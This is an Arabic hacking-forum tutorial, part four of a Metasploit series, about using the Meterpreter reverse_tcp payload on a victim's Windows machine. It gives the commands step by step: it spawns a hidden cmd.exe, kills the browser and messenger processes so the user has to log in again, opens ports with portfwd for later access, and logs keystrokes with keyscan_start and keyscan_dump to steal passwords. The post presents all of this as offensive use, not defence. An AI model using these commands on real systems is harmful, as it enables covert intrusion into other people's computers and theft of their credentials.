الشامل في الميتاسبلويت الجزء الرابع

اسعد الله اوقات الجميع بكل خير ومحبة ..

وعسى ان يكون الكل بافضل حاله واحسن صحة..

في البداية نشكر كل الاعضاء لما يبذلونه من جهد لرقي المنتدى وازدهاره.

اليوم انشاء الله سأقدم لكم الجزء الرابع من العملاق الميتاسبلويت

هذا الجزء مخصص لبايلود روعة و هو بايلود سحب الباسوردات لووول meterpreter

إن من ما يقدمه هذا البايلود , هو خصائص كثيرة وكتير حلوة .. فإنها تغنيك عن الإتصال العكسي لأن وأنت

بداخلها تقدر تتحكم بالدوس وأي أمر تاني .

وهو يمكنك من أن تشبك مع أي بروسيس .. وتشغيله,,وتخليك تشوف البروسيس المشغل و تتحكم فيه

لتشغيل البايلود في الميتا عليك تطبيق الامر التالي :

set payload windows/meterpreter/reverse_tcp

افضل استعمال الاتصال العكسي على المباشر

كل ما علينا لمعرفة كافة مهام هذا البايلود

علينا تنفيد الامر help

للتحميل download للتحرك في الملفات cd لعرض الملفات ls وهناك الكثير الكثير

الامر الاروع execute يمكننا من تشغيل اي بروسيس و التفاعل معه

احسن شيء تشغيل موجه الاوامر cmd prompt

نشغله بالامر التالي :

execute -H -c -f cmd.exe

-H عرض موجه الاوامر مخفي

وبعد ما نكون نفذنا الأمر فإنه يحصل على رقم قناة خاصة به channel وللدخول والتفاعل معها نكتب

interact 10

نقدر نشوف البروسيسات المشغلة في جهاز الضحية بتطبيق الامر التالي ps

كما نعرف انا لكل بروسيس اي دي خاص به و هدا يمكننا من قتل اي بروسيس وهدا ينفعنا كثيرا

لقتل البروسيس علينا تطبيق الامر Kill PID

PID هو proceseur identifier

ليس هذا فقط بل وأيضا هناك أوامر أخرى كثير من تعديل لللأيبيهات وفتح بورت خاص portfwd لكي تتصل

متى شئت وتنفد هجوماتك .

لسرقة باسوود وهذا الجزء اعرفه انه المهم صح

نفحص البروسيسات متلا msnmessenger.exe

نشوف رقم البروسيس و نقتله kill 1264

و كذلك الشأن بالنسبه للاكسبلورر و الفيرفوكس ادا بدك باسورداتها

بعد دلك نطبق امر فحص الباسورردات

keyscan_start

وهو يعمل سنيف لاي باسورد يكتب يسجل اي شيء هههه

keyscan_dump

هذا الامر لعرض الباسوردات المسحوبة

الان متال لتطبيق هذه الثغرة

set payload windows/meterpreter/reverse_tcp

ps

kill 12658(pid)

keyscan_start

keyscan_dump

انتهى الشرح ارجوا ان ينال اعجابكم

نتلقي في الجزء الخامس انشاء الله

جميع الحقوق محفوظة لمنتديات الجيوش

في امان الله